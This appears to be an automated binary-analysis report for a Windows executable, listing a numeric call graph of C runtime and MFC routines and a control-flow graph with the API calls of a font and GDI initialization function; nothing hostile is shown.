4d2cc2 63767->63768 63771 4d2cd8 ctype 63767->63771 63844 4d80e0 73 API calls 2 library calls 63768->63844 63770 4d2ccd 63770->63571 63845 4d4fa0 73 API calls 2 library calls 63771->63845 63773 4d2d0c 63773->63571 63778 4d5e51 _wcsnlen 63774->63778 63775 4d8c10 73 API calls ctype 63775->63778 63776 4d8b70 ctype 73 API calls 63776->63778 63777 5cce5d _memcpy_s 70 API calls 63777->63778 63778->63775 63778->63776 63778->63777 63779 4d1c22 63778->63779 63780 4db7f2 63779->63780 63781 4db817 ctype 63780->63781 63782 4db85d lstrlenW 63781->63782 63783 4db820 63781->63783 63782->63783 63784 4db868 ctype 63782->63784 63786 4d8e6a std::_Mutex::_Mutex 70 API calls 63783->63786 63785 4db86d SetLastError 63784->63785 63811 4db94b 63785->63811 63787 4db834 63786->63787 63789 5ce545 __wcsdup 70 API calls 63787->63789 63788 5cc787 __crtLCMapStringA_stat 5 API calls 63790 4db95b 63788->63790 63791 4db842 ctype 63789->63791 63790->63575 63792 4db87a FindFirstFileW 63791->63792 63793 4db856 63791->63793 63794 4db880 63792->63794 63846 4db3fe GetModuleHandleW GetProcAddress FindFirstFileW 63793->63846 63796 4db888 GetLastError 63794->63796 63797 4db89a 63794->63797 63796->63784 63847 4d8bd0 73 API calls ctype 63797->63847 63798 4db85b 63798->63794 63800 4db8a5 63801 4db8bc 63800->63801 63802 4d8c10 ctype 73 API calls 63800->63802 63848 5cffb4 79 API calls 5 library calls 63801->63848 63802->63801 63804 4db8d9 63804->63784 63805 4db8f6 63804->63805 63849 5cf9c8 70 API calls 2 library calls 63805->63849 63807 4db919 ctype 63850 5cfbda 70 API calls __wctomb_s_l 63807->63850 63809 4db938 ctype 63851 4d8170 74 API calls 3 library calls 63809->63851 63811->63788 63813 4db3ca 63812->63813 63814 4db3c6 63812->63814 63815 4db3df FindNextFileW 63813->63815 63816 4d8e6a std::_Mutex::_Mutex 70 API calls 63813->63816 63814->63575 63815->63575 63817 4db3db 63816->63817 63817->63815 63819 4dbada __EH_prolog3 ctype 63818->63819 63820 4d86c0 ctype 73 API calls 63819->63820 63821 4dbaf2 ctype ~_Task_impl 63820->63821 63821->63575 63852 5cd428 63822->63852 63826 4d2d36 63825->63826 63827 4d2d3f 63826->63827 63830 4d2d54 ctype 63826->63830 63911 4d80e0 73 API calls 2 library calls 63827->63911 63829 4d2d4a 63829->63575 63912 4d4fa0 73 API calls 2 library calls 63830->63912 63832 4d2d83 63832->63575 63834 4dba41 __EH_prolog3 63833->63834 63835 4d8070 ctype 73 API calls 63834->63835 63836 4dba57 63835->63836 63837 4dacff ctype 2 API calls 63836->63837 63838 4dba85 63836->63838 63837->63838 63839 4dba9e 63838->63839 63913 4da6b5 73 API calls 63838->63913 63841 4d5e30 73 API calls 63839->63841 63842 4dbab9 ctype ~_Task_impl 63841->63842 63842->63587 63843->63584 63844->63770 63845->63773 63846->63798 63847->63800 63848->63804 63849->63807 63850->63809 63851->63811 63857 5cd077 63852->63857 63858 5cd0d7 63857->63858 63859 5cd08a 63857->63859 63865 5cd2b8 63858->63865 63898 5d5dc1 70 API calls 2 library calls 63859->63898 63861 5cd08f 63862 5cd0b7 63861->63862 63899 5d5b5b 78 API calls 6 library calls 63861->63899 63862->63858 63900 5d53da 72 API calls 6 library calls 63862->63900 63866 5cd2e8 _wcsnlen 63865->63866 63867 5cd2d4 63865->63867 63866->63867 63870 5cd2ff 63866->63870 63901 5ce629 70 API calls __getptd_noexit 63867->63901 63869 5cd2d9 63902 5d406b 11 API calls __wctomb_s_l 63869->63902 63875 5cd2e3 63870->63875 63903 5d60f3 LCMapStringW _wcsnlen 63870->63903 63873 5cd345 63876 5cd368 63873->63876 63877 5cd351 63873->63877 63874 5cc787 __crtLCMapStringA_stat 5 API calls 63879 5cd426 63874->63879 63875->63874 63878 5cd36d 63876->63878 63888 5cd37e 63876->63888 63904 5ce629 70 API calls __getptd_noexit 63877->63904 63906 5ce629 70 API calls __getptd_noexit 63878->63906 63879->63575 63882 5cd356 63905 5ce629 70 API calls __getptd_noexit 63882->63905 63883 5cd3c9 63907 5ce629 70 API calls __getptd_noexit 63883->63907 63884 5cd3d6 63908 5d60f3 LCMapStringW _wcsnlen 63884->63908 63890 5cd399 __crtLCMapStringA_stat 63888->63890 63891 5ce4b1 _malloc 70 API calls 63888->63891 63889 5cd3e9 63892 5cd3f0 63889->63892 63893 5cd401 63889->63893 63890->63883 63890->63884 63891->63890 63894 5ce545 __wcsdup 70 API calls 63892->63894 63909 5ce629 70 API calls __getptd_noexit 63893->63909 63896 5cd3fa 63894->63896 63910 57caa0 70 API calls _free 63896->63910 63898->63861 63899->63862 63900->63858 63901->63869 63902->63875 63903->63873 63904->63882 63905->63875 63906->63869 63907->63882 63908->63889 63909->63896 63910->63875 63911->63829 63912->63832 63913->63839 63914->63604 63915->63607 63916->63609 63917->63612 63918->63614 63919->63618 63920->63620 63921->63610 63922->63643 63923->63648 63924->63651 63925->63633 63926->63661 63927->63659 63928->63663 63929->63675 63930 4d3230 63943 4d7680 63930->63943 63932 4d328a 63955 4d60f0 63932->63955 63935 4d32c7 63964 4d5110 63935->63964 63940 4d3386 63941 4d33af 63940->63941 63989 4d8570 71 API calls 2 library calls 63940->63989 63990 4d8570 71 API calls 2 library calls 63943->63990 63945 4d76ba 63946 4d8e6a std::_Mutex::_Mutex 70 API calls 63945->63946 63947 4d76c1 63946->63947 63948 4d7703 63947->63948 63991 5e899b 73 API calls 9 library calls 63947->63991 63948->63932 63950 4d76cf 63992 5e84e0 63950->63992 64002 4d7f90 63955->64002 63960 4d32a6 63960->63935 63988 4d8570 71 API calls 2 library calls 63960->63988 63961 5e84e0 std::_Lockit::_Lockit EnterCriticalSection 63962 4d614b 63961->63962 63963 5e8508 std::ios_base::_Addstd LeaveCriticalSection 63962->63963 63963->63960 64031 5e83ee 63964->64031 63967 4d8e6a std::_Mutex::_Mutex 70 API calls 63968 4d5159 63967->63968 63974 4d32ea 63968->63974 64036 5e899b 73 API calls 9 library calls 63968->64036 63970 4d5167 63971 5e84e0 std::_Lockit::_Lockit EnterCriticalSection 63970->63971 63972 4d517a 63971->63972 63973 5e8508 std::ios_base::_Addstd LeaveCriticalSection 63972->63973 63973->63974 63975 4d4120 63974->63975 63976 4d4151 63975->63976 63977 4d41f0 63975->63977 64038 5e86c3 63976->64038 63977->63940 63979 4d415f 63979->63977 64048 4d5200 EnterCriticalSection LeaveCriticalSection std::ios_base::_Addstd std::_Lockit::_Lockit 63979->64048 63981 4d417e 64049 4d67f0 108 API calls 4 library calls 63981->64049 63983 4d418b 63984 5e84e0 std::_Lockit::_Lockit EnterCriticalSection 63983->63984 63987 4d41cf 63983->63987 63985 4d41ae 63984->63985 63986 5e8508 std::ios_base::_Addstd LeaveCriticalSection 63985->63986 63986->63987 63987->63940 63988->63935 63989->63941 63990->63945 63991->63950 63993 5e84f2 63992->63993 63994 4d76e2 63992->63994 64000 5e8cdf EnterCriticalSection 63993->64000 63996 5e8508 63994->63996 63997 4d76f9 63996->63997 63998 5e850f 63996->63998 63997->63932 64001 5e8cef LeaveCriticalSection 63998->64001 64000->63994 64001->63997 64003 5e84e0 std::_Lockit::_Lockit EnterCriticalSection 64002->64003 64004 4d7fa9 64003->64004 64005 5e8508 std::ios_base::_Addstd LeaveCriticalSection 64004->64005 64006 4d6121 64005->64006 64007 4d7310 64006->64007 64008 5e84e0 std::_Lockit::_Lockit EnterCriticalSection 64007->64008 64009 4d7342 64008->64009 64010 5e84e0 std::_Lockit::_Lockit EnterCriticalSection 64009->64010 64013 4d7386 64009->64013 64011 4d7365 64010->64011 64014 5e8508 std::ios_base::_Addstd LeaveCriticalSection 64011->64014 64012 4d73c6 64015 5e8508 std::ios_base::_Addstd LeaveCriticalSection 64012->64015 64013->64012 64028 4d7230 108 API calls 2 library calls 64013->64028 64014->64013 64017 4d612e 64015->64017 64017->63960 64017->63961 64018 4d73d4 64019 4d73f7 64018->64019 64029 5ccb99 70 API calls std::exception::exception 64018->64029 64020 5e84e0 std::_Lockit::_Lockit EnterCriticalSection 64019->64020 64023 4d740a 64020->64023 64022 4d73e9 64024 5cf7e9 __CxxThrowException@8 RaiseException 64022->64024 64025 5e8508 std::ios_base::_Addstd LeaveCriticalSection 64023->64025 64024->64019 64026 4d741e 64025->64026 64030 5e86e3 70 API calls std::_Mutex::_Mutex 64026->64030 64028->64018 64029->64022 64030->64012 64032 4d8e6a std::_Mutex::_Mutex 70 API calls 64031->64032 64033 5e83fa 64032->64033 64037 5e8cbf InitializeCriticalSection 64033->64037 64035 4d514b 64035->63967 64036->63970 64037->64035 64039 5e861b 64038->64039 64040 5e8680 64039->64040 64042 5e85fc std::_Xfsopen 147 API calls 64039->64042 64047 5e8666 64039->64047 64045 5e8687 64040->64045 64050 5e85fc 64040->64050 64042->64040 64045->64047 64053 5ce05b 64045->64053 64047->63979 64048->63981 64049->63983 64067 5e8eea 64050->64067 64052 5e8616 64052->64047 64066 5d39d7 105 API calls 5 library calls 64052->64066 64054 5ce067 __ftelli64 64053->64054 64055 5ce08e 64054->64055 64056 5ce079 64054->64056 64063 5ce089 __ftelli64 64055->64063 64385 5cd549 64055->64385 64407 5ce629 70 API calls __getptd_noexit 64056->64407 64059 5ce07e 64408 5d406b 11 API calls __wctomb_s_l 64059->64408 64063->64047 64066->64045 64068 5e8ef6 __ftelli64 64067->64068 64069 5e8f09 64068->64069 64072 5e8f36 64068->64072 64126 5ce629 70 API calls __getptd_noexit 64069->64126 64071 5e8f0e 64127 5d406b 11 API calls __wctomb_s_l 64071->64127 64086 5dfabb 64072->64086 64075 5e8f3b 64076 5e8f4f 64075->64076 64077 5e8f42 64075->64077 64078 5e8f76 64076->64078 64079 5e8f56 64076->64079 64128 5ce629 70 API calls __getptd_noexit 64077->64128 64104 5e8fb2 64078->64104 64129 5ce629 70 API calls __getptd_noexit 64079->64129 64083 5e8f19 __ftelli64 @_EH4_CallFilterFunc@8 64083->64052 64087 5dfac7 __ftelli64 64086->64087 64088 5d703b __lock 70 API calls 64087->64088 64101 5dfad5 64088->64101 64089 5dfb4a 64131 5dfbe5 64089->64131 64090 5dfb51 64136 5d4287 70 API calls _malloc 64090->64136 64093 5dfb58 64093->64089 64095 5dfb66 InitializeCriticalSectionAndSpinCount 64093->64095 64094 5dfbda __ftelli64 64094->64075 64096 5dfb99 EnterCriticalSection 64095->64096 64097 5dfb86 64095->64097 64096->64089 64137 5ce216 70 API calls 2 library calls 64097->64137 64098 5d6f79 __mtinitlocknum 70 API calls 64098->64101 64101->64089 64101->64090 64101->64098 64134 5cd58a 71 API calls __lock 64101->64134 64135 5cd5f8 LeaveCriticalSection LeaveCriticalSection _doexit 64101->64135 64102 5dfb8e 64102->64089 64105 5e8fd4 64104->64105 64106 5e8fe8 64105->64106 64118 5e8fff 64105->64118 64142 5ce629 70 API calls __getptd_noexit 64106->64142 64108 5e8fed 64143 5d406b 11 API calls __wctomb_s_l 64108->64143 64109 5e919c 64111 5e9202 64109->64111 64112 5e91f0 64109->64112 64139 5e9a41 64111->64139 64148 5ce629 70 API calls __getptd_noexit 64112->64148 64115 5e8f81 64130 5e8f9c LeaveCriticalSection LeaveCriticalSection __fseeki64 64115->64130 64116 5e91f5 64149 5d406b 11 API calls __wctomb_s_l 64116->64149 64118->64109 64118->64112 64144 5e9dcb 80 API calls __fassign 64118->64144 64120 5e916b 64120->64112 64145 5e9c65 89 API calls __mbsnbicmp_l 64120->64145 64122 5e9195 64122->64109 64146 5e9c65 89 API calls __mbsnbicmp_l 64122->64146 64124 5e91b4 64124->64109 64147 5e9c65 89 API calls __mbsnbicmp_l 64124->64147 64126->64071 64127->64083 64128->64083 64129->64083 64130->64083 64138 5d6f62 LeaveCriticalSection 64131->64138 64133 5dfbec 64133->64094 64134->64101 64135->64101 64136->64093 64137->64102 64138->64133 64150 5e997d 64139->64150 64141 5e9a5c 64141->64115 64142->64108 64143->64115 64144->64120 64145->64122 64146->64124 64147->64109 64148->64116 64149->64115 64152 5e9989 __ftelli64 64150->64152 64151 5e999c 64269 5ce629 70 API calls __getptd_noexit 64151->64269 64152->64151 64154 5e99d2 64152->64154 64161 5e9249 64154->64161 64155 5e99a1 64270 5d406b 11 API calls __wctomb_s_l 64155->64270 64158 5e99ec 64271 5e9a13 LeaveCriticalSection __unlock_fhandle 64158->64271 64160 5e99ab __ftelli64 64160->64141 64162 5e9270 64161->64162 64272 5ea056 64162->64272 64165 5e928c 64166 5e92cb 64165->64166 64172 5e9326 64165->64172 64215 5e94fb 64165->64215 64301 5ce63c 70 API calls __getptd_noexit 64166->64301 64168 5e999c 64346 5ce629 70 API calls __getptd_noexit 64168->64346 64169 5e92d0 64302 5ce629 70 API calls __getptd_noexit 64169->64302 64170 5e997c __ftelli64 64170->64168 64174 5e99d2 64170->64174 64179 5e93ad 64172->64179 64187 5e9380 64172->64187 64177 5e9249 __tsopen_nolock 124 API calls 64174->64177 64175 5e99a1 64347 5d406b 11 API calls __wctomb_s_l 64175->64347 64176 5e92da 64303 5d406b 11 API calls __wctomb_s_l 64176->64303 64181 5e99ec 64177->64181 64304 5ce63c 70 API calls __getptd_noexit 64179->64304 64348 5e9a13 LeaveCriticalSection __unlock_fhandle 64181->64348 64184 5e93b2 64305 5ce629 70 API calls __getptd_noexit 64184->64305 64186 5e99ab __ftelli64 64186->64158 64279 5d35fa 64187->64279 64188 5e93bc 64306 5d406b 11 API calls __wctomb_s_l 64188->64306 64191 5e92e4 64191->64158 64192 5e943e 64193 5e9468 CreateFileA 64192->64193 64194 5e9447 64192->64194 64196 5e9505 GetFileType 64193->64196 64197 5e9495 64193->64197 64307 5ce63c 70 API calls __getptd_noexit 64194->64307 64199 5e9556 64196->64199 64200 5e9512 GetLastError 64196->64200 64201 5e94ce GetLastError 64197->64201 64204 5e94a9 CreateFileA 64197->64204 64198 5e944c 64308 5ce629 70 API calls __getptd_noexit 64198->64308 64314 5d33c4 71 API calls 2 library calls 64199->64314 64312 5ce64f 70 API calls 3 library calls 64200->64312 64310 5ce64f 70 API calls 3 library calls 64201->64310 64204->64196 64204->64201 64206 5e9456 64309 5ce629 70 API calls __getptd_noexit 64206->64309 64207 5e953b CloseHandle 64208 5e94f5 64207->64208 64210 5e9549 64207->64210 64311 5ce629 70 API calls __getptd_noexit 64208->64311 64313 5ce629 70 API calls __getptd_noexit 64210->64313 64213 5e9574 64217 5e9868 64213->64217 64218 5e95ca 64213->64218 64222 5e9639 64213->64222 64298 5d4019 64215->64298 64216 5e954e 64216->64208 64217->64215 64220 5e98f2 CloseHandle CreateFileA 64217->64220 64315 5e05cd 72 API calls 3 library calls 64218->64315 64223 5e991f GetLastError 64220->64223 64224 5e97fe 64220->64224 64221 5e95d4 64225 5e95dd 64221->64225 64226 5e95f6 64221->64226 64222->64217 64232 5e9793 64222->64232 64242 5e96e3 64222->64242 64344 5ce64f 70 API calls 3 library calls 64223->64344 64224->64215 64316 5ce63c 70 API calls __getptd_noexit 64225->64316 64332 5dfbee 80 API calls 6 library calls 64226->64332 64230 5e992b 64345 5d3445 71 API calls 2 library calls 64230->64345 64231 5e95e2 64231->64222 64235 5e95ea 64231->64235 64232->64217 64241 5e97b0 64232->64241 64246 5e9707 64232->64246 64233 5e9607 64237 5e9620 64233->64237 64333 5e9de5 104 API calls 5 library calls 64233->64333 64317 5d7f82 64235->64317 64236 5e974e 64236->64235 64337 5dfbee 80 API calls 6 library calls 64236->64337 64237->64235 64334 5e05cd 72 API calls 3 library calls 64237->64334 64338 5d7952 72 API calls 3 library calls 64241->64338 64242->64217 64242->64236 64242->64246 64247 5e9732 64242->64247 64245 5e97bb 64245->64246 64249 5e97c6 64245->64249 64246->64217 64246->64235 64343 5d776b 101 API calls 6 library calls 64246->64343 64335 5d7952 72 API calls 3 library calls 64247->64335 64339 5d7952 72 API calls 3 library calls 64249->64339 64251 5e980b 64253 5e982d 64251->64253 64260 5e9812 64251->64260 64252 5e97f1 64258 5d7f82 __close_nolock 73 API calls 64252->64258 64342 5e05cd 72 API calls 3 library calls 64253->64342 64254 5e9768 64254->64235 64254->64251 64254->64252 64254->64253 64259 5e978a 64254->64259 64255 5e973d 64255->64246 64262 5e9744 64255->64262 64264 5e97f8 64258->64264 64259->64217 64341 5e05cd 72 API calls 3 library calls 64260->64341 64336 5d7952 72 API calls 3 library calls 64262->64336 64263 5e97d0 64263->64217 64263->64235 64340 5ce629 70 API calls __getptd_noexit 64264->64340 64265 5e981c 64265->64235 64265->64259 64269->64155 64270->64160 64271->64160 64273 5ea077 64272->64273 64274 5ea062 64272->64274 64273->64165 64349 5ce629 70 API calls __getptd_noexit 64274->64349 64276 5ea067 64350 5d406b 11 API calls __wctomb_s_l 64276->64350 64278 5ea072 64278->64165 64280 5d3606 __ftelli64 64279->64280 64281 5d6f79 __mtinitlocknum 70 API calls 64280->64281 64282 5d3616 64281->64282 64283 5d703b __lock 70 API calls 64282->64283 64284 5d361b __ftelli64 64282->64284 64293 5d362a 64283->64293 64284->64192 64285 5d3775 64363 5d378a LeaveCriticalSection _doexit 64285->64363 64287 5d3702 64352 5d42cc 70 API calls __calloc_crt 64287->64352 64289 5d36aa EnterCriticalSection 64292 5d36ba LeaveCriticalSection 64289->64292 64289->64293 64290 5d703b __lock 70 API calls 64290->64293 64291 5d370b 64291->64285 64353 5d3534 64291->64353 64292->64293 64293->64285 64293->64287 64293->64289 64293->64290 64295 5d3680 InitializeCriticalSectionAndSpinCount 64293->64295 64351 5d36cc LeaveCriticalSection _doexit 64293->64351 64295->64293 64297 5d376c 64297->64285 64364 5d3ef0 64298->64364 64301->64169 64302->64176 64303->64191 64304->64184 64305->64188 64306->64191 64307->64198 64308->64206 64309->64191 64310->64208 64311->64215 64312->64207 64313->64216 64314->64213 64315->64221 64316->64231 64370 5d34cb 64317->64370 64319 5d7fe8 64383 5d3445 71 API calls 2 library calls 64319->64383 64321 5d7f92 64321->64319 64322 5d34cb __lseeki64_nolock 70 API calls 64321->64322 64331 5d7fc6 64321->64331 64325 5d7fbd 64322->64325 64323 5d34cb __lseeki64_nolock 70 API calls 64326 5d7fd2 CloseHandle 64323->64326 64324 5d7ff0 64327 5d8012 64324->64327 64384 5ce64f 70 API calls 3 library calls 64324->64384 64328 5d34cb __lseeki64_nolock 70 API calls 64325->64328 64326->64319 64329 5d7fde GetLastError 64326->64329 64327->64208 64328->64331 64329->64319 64331->64319 64331->64323 64332->64233 64333->64237 64334->64231 64335->64255 64336->64236 64337->64254 64338->64245 64339->64263 64340->64224 64341->64265 64342->64263 64343->64246 64344->64230 64345->64224 64346->64175 64347->64186 64348->64186 64349->64276 64350->64278 64351->64293 64352->64291 64355 5d3540 __ftelli64 64353->64355 64354 5d359a 64357 5d35bc __ftelli64 64354->64357 64358 5d359f EnterCriticalSection 64354->64358 64355->64354 64356 5d703b __lock 70 API calls 64355->64356 64359 5d356c 64356->64359 64357->64297 64358->64357 64360 5d3588 64359->64360 64361 5d3575 InitializeCriticalSectionAndSpinCount 64359->64361 64362 5d35ca ___lock_fhandle LeaveCriticalSection 64360->64362 64361->64360 64362->64354 64363->64284 64365 5d3f0f _memset __call_reportfault 64364->64365 64366 5d3f2d IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 64365->64366 64367 5d3ffb __call_reportfault 64366->64367 64368 5cc787 __crtLCMapStringA_stat 5 API calls 64367->64368 64369 5d4017 GetCurrentProcess TerminateProcess 64368->64369 64369->64170 64371 5d34d8 64370->64371 64372 5d34f0 64370->64372 64373 5ce63c __lseeki64 70 API calls 64371->64373 64374 5ce63c __lseeki64 70 API calls 64372->64374 64377 5d352f 64372->64377 64375 5d34dd 64373->64375 64376 5d3501 64374->64376 64378 5ce629 __wctomb_s_l 70 API calls 64375->64378 64379 5ce629 __wctomb_s_l 70 API calls 64376->64379 64377->64321 64381 5d34e5 64378->64381 64380 5d3509 64379->64380 64382 5d406b __wctomb_s_l 11 API calls 64380->64382 64381->64321 64382->64381 64383->64324 64384->64327 64386 5cd57d EnterCriticalSection 64385->64386 64387 5cd55b 64385->64387 64390 5cd573 64386->64390 64387->64386 64388 5cd563 64387->64388 64389 5d703b __lock 70 API calls 64388->64389 64389->64390 64391 5cdfee 64390->64391 64392 5cdfff 64391->64392 64393 5ce013 64391->64393 64450 5ce629 70 API calls __getptd_noexit 64392->64450 64399 5ce00f 64393->64399 64410 5cde08 64393->64410 64395 5ce004 64451 5d406b 11 API calls __wctomb_s_l 64395->64451 64409 5ce0c7 LeaveCriticalSection LeaveCriticalSection __fseeki64 64399->64409 64403 5ce02d 64427 5d801e 64403->64427 64405 5ce033 64405->64399 64452 5ce216 70 API calls 2 library calls 64405->64452 64407->64059 64408->64063 64409->64063 64411 5cde21 64410->64411 64415 5cde43 64410->64415 64412 5d3793 __flsbuf 70 API calls 64411->64412 64411->64415 64413 5cde3c 64412->64413 64453 5d776b 101 API calls 6 library calls 64413->64453 64416 5d7e78 64415->64416 64417 5d7e88 64416->64417 64418 5ce027 64416->64418 64417->64418 64454 5ce216 70 API calls 2 library calls 64417->64454 64420 5d3793 64418->64420 64421 5d379f 64420->64421 64422 5d37b4 64420->64422 64455 5ce629 70 API calls __getptd_noexit 64421->64455 64422->64403 64424 5d37a4 64456 5d406b 11 API calls __wctomb_s_l 64424->64456 64426 5d37af 64426->64403 64428 5d802a __ftelli64 64427->64428 64429 5d804d 64428->64429 64430 5d8032 64428->64430 64432 5d8059 64429->64432 64435 5d8093 64429->64435 64457 5ce63c 70 API calls __getptd_noexit 64430->64457 64459 5ce63c 70 API calls __getptd_noexit 64432->64459 64433 5d8037 64458 5ce629 70 API calls __getptd_noexit 64433->64458 64439 5d3534 ___lock_fhandle 72 API calls 64435->64439 64437 5d805e 64460 5ce629 70 API calls __getptd_noexit 64437->64460 64442 5d8099 64439->64442 64440 5d803f __ftelli64 64440->64405 64441 5d8066 64461 5d406b 11 API calls __wctomb_s_l 64441->64461 64444 5d80a7 64442->64444 64445 5d80b3 64442->64445 64446 5d7f82 __close_nolock 73 API calls 64444->64446 64462 5ce629 70 API calls __getptd_noexit 64445->64462 64448 5d80ad 64446->64448 64463 5d80da LeaveCriticalSection __unlock_fhandle 64448->64463 64450->64395 64451->64399 64452->64399 64453->64415 64454->64418 64455->64424 64456->64426 64457->64433 64458->64440 64459->64437 64460->64441 64461->64440 64462->64448 64463->64440 64464 4d33d0 64465 4d3410 64464->64465 64467 4d343b 64465->64467 64474 4d4210 64465->64474 64469 4d3483 moneypunct 64467->64469 64471 5e84e0 std::_Lockit::_Lockit EnterCriticalSection 64467->64471 64480 5e8408 DeleteCriticalSection moneypunct 64469->64480 64470 4d34ac 64472 4d3462 64471->64472 64473 5e8508 std::ios_base::_Addstd LeaveCriticalSection 64472->64473 64473->64469 64475 4d421e 64474->64475 64476 4d4232 64474->64476 64481 4d4340 64475->64481 64476->64467 64479 5ce05b 106 API calls 64479->64476 64480->64470 64484 4d43f2 64481->64484 64489 4d4377 64481->64489 64482 5cc787 __crtLCMapStringA_stat 5 API calls 64483 4d4223 64482->64483 64483->64479 64484->64482 64486 4d450d 64493 5e8541 71 API calls 2 library calls 64486->64493 64488 4d4517 64489->64484 64489->64486 64491 5cd77e 103 API calls 3 library calls 64489->64491 64492 4d77e0 71 API calls 5 library calls 64489->64492 64491->64489 64492->64489 64493->64488

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 4de757-4de7ae call 5ceabf call 4e0431 GetDeviceCaps 5 4de7c9 0->5 6 4de7b0-4de7bf 0->6 7 4de7cb 5->7 6->7 8 4de7c1-4de7c7 6->8 9 4de7cd-4de7db 7->9 8->9 10 4de7dd-4de7e0 9->10 11 4de7ea-4de7f8 9->11 10->11 12 4de7e2-4de7e8 call 4e060a DeleteObject 10->12 13 4de7fa-4de7fd 11->13 14 4de807-4de815 11->14 12->11 13->14 16 4de7ff-4de805 call 4e060a DeleteObject 13->16 17 4de824-4de82c 14->17 18 4de817-4de81a 14->18 16->14 22 4de82e-4de831 17->22 23 4de83b-4de849 17->23 18->17 21 4de81c-4de822 call 4e060a DeleteObject 18->21 21->17 22->23 24 4de833-4de839 call 4e060a DeleteObject 22->24 25 4de858-4de860 23->25 26 4de84b-4de84e 23->26 24->23 31 4de86f-4de877 25->31 32 4de862-4de865 25->32 26->25 30 4de850-4de856 call 4e060a DeleteObject 26->30 30->25 37 4de879-4de87c 31->37 38 4de886-4de88e 31->38 32->31 36 4de867-4de86d call 4e060a DeleteObject 32->36 36->31 37->38 43 4de87e-4de884 call 4e060a DeleteObject 37->43 39 4de89d-4de8ab 38->39 40 4de890-4de893 38->40 46 4de8ad-4de8b0 39->46 47 4de8ba-4de8c2 39->47 40->39 45 4de895-4de89b call 4e060a DeleteObject 40->45 43->38 45->39 46->47 51 4de8b2-4de8b8 call 4e060a DeleteObject 46->51 52 4de8c4-4de8c7 47->52 53 4de8d1-4de929 call 4dd0a7 call 5cf570 GetTextCharsetInfo 47->53 51->47 52->53 57 4de8c9-4de8cf call 4e060a DeleteObject 52->57 64 4de92b-4de92e 53->64 65 4de930 53->65 57->53 66 4de931-4de937 64->66 65->66 67 4de939 66->67 68 4de93b-4de953 lstrcpyW 66->68 67->68 69 4de9bb-4dea0c CreateFontIndirectW call 4e05dc call 5d1729 call 5d19d0 68->69 70 4de955-4de95c 68->70 83 4dea0e 69->83 84 4dea11-4deb12 CreateFontIndirectW call 4e05dc call 4dd0a7 CreateFontIndirectW call 4e05dc CreateFontIndirectW call 4e05dc CreateFontIndirectW call 4e05dc GetSystemMetrics lstrcpyW CreateFontIndirectW call 4e05dc GetStockObject 69->84 70->69 72 4de95e-4de97a EnumFontFamiliesW 70->72 74 4de97c-4de98c lstrcpyW 72->74 75 4de98e-4de9a8 EnumFontFamiliesW 72->75 74->69 77 4de9aa-4de9b0 75->77 78 4de9b2 75->78 79 4de9b8-4de9b9 lstrcpyW 77->79 78->79 79->69 83->84 97 4deb18-4deb28 GetObjectW 84->97 98 4deb9a-4debf5 GetStockObject call 4e05c8 GetObjectW CreateFontIndirectW call 4e05dc CreateFontIndirectW call 4e05dc call 4dd2a2 84->98 97->98 99 4deb2a-4deb95 lstrcpyW CreateFontIndirectW call 4e05dc CreateFontIndirectW call 4e05dc 97->99 111 4dec23-4dec25 98->111 99->98 112 4debf7-4debfb 111->112 113 4dec27-4dec3b call 4ddc8f 111->113 114 4debfd-4dec0b 112->114 115 4dec55-4dede9 call 4dacff call 5ceabf GetVersionExW KiUserCallbackDispatcher 112->115 119 4dec40-4dec54 call 4e0485 call 5ceb42 113->119 114->115 118 4dec0d-4dec17 call 4e8fc5 114->118 130 4dedfb 115->130 131 4dedeb-4dedf2 115->131 118->111 128 4dec19-4dec1b 118->128 128->111 133 4dee01-4dee03 130->133 134 4dedfd-4dedff 130->134 132 4dedf4 131->132 131->133 132->130 135 4dee04-4dee43 call 4de141 call 4d94e4 133->135 134->135 140 4dee45-4deeb2 GetProcAddress * 6 135->140 141 4deeb4-4deed2 135->141 142 4deed8-4deeeb call 4dd20c 140->142 141->142 145 4deeed-4def21 GetProcAddress * 3 142->145 146 4def23-4def2f 142->146 147 4def35-4def72 call 4de757 145->147 146->147 149 4def77-4deff8 call 4dcd68 call 5ceb42 147->149
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 004DE761
                                                                • Part of subcall function 004E0431: __EH_prolog3.LIBCMT ref: 004E0438
                                                                • Part of subcall function 004E0431: GetWindowDC.USER32(00000000,00000004,004DE19D,00000000,?,?,00605254), ref: 004E0464
                                                              • GetDeviceCaps.GDI32(?,00000058), ref: 004DE787
                                                              • DeleteObject.GDI32(00000000), ref: 004DE7E8
                                                              • DeleteObject.GDI32(00000000), ref: 004DE805
                                                              • DeleteObject.GDI32(00000000), ref: 004DE822
                                                              • DeleteObject.GDI32(00000000), ref: 004DE839
                                                              • DeleteObject.GDI32(00000000), ref: 004DE856
                                                              • DeleteObject.GDI32(00000000), ref: 004DE86D
                                                              • DeleteObject.GDI32(00000000), ref: 004DE884
                                                              • DeleteObject.GDI32(00000000), ref: 004DE89B
                                                              • DeleteObject.GDI32(00000000), ref: 004DE8B8
                                                              • DeleteObject.GDI32(00000000), ref: 004DE8CF
                                                              • _memset.LIBCMT ref: 004DE8F0
                                                              • GetTextCharsetInfo.GDI32(?,00000000,00000000), ref: 004DE900
                                                              • lstrcpyW.KERNEL32(?,?), ref: 004DE94F
                                                              • EnumFontFamiliesW.GDI32(?,00000000,Function_0000E70E), ref: 004DE976
                                                              • lstrcpyW.KERNEL32(?), ref: 004DE986
                                                              • EnumFontFamiliesW.GDI32(?,00000000,Function_0000E70E), ref: 004DE9A1
                                                              • lstrcpyW.KERNEL32(?), ref: 004DE9B9
                                                              • CreateFontIndirectW.GDI32(?), ref: 004DE9C5
                                                              • CreateFontIndirectW.GDI32(?), ref: 004DEA15
                                                              • CreateFontIndirectW.GDI32(?), ref: 004DEA5A
                                                              • CreateFontIndirectW.GDI32(?), ref: 004DEA82
                                                              • CreateFontIndirectW.GDI32(?), ref: 004DEA9F
                                                              • GetSystemMetrics.USER32(00000048), ref: 004DEABA
                                                              • lstrcpyW.KERNEL32(?), ref: 004DEACE
                                                              • CreateFontIndirectW.GDI32(?), ref: 004DEAD4
                                                              • GetStockObject.GDI32(00000011), ref: 004DEB02
                                                              • GetObjectW.GDI32(?,0000005C,?), ref: 004DEB24
                                                              • lstrcpyW.KERNEL32(?), ref: 004DEB5D
                                                              • CreateFontIndirectW.GDI32(?), ref: 004DEB67
                                                              • CreateFontIndirectW.GDI32(?), ref: 004DEB86
                                                              • GetStockObject.GDI32(00000011), ref: 004DEB9C
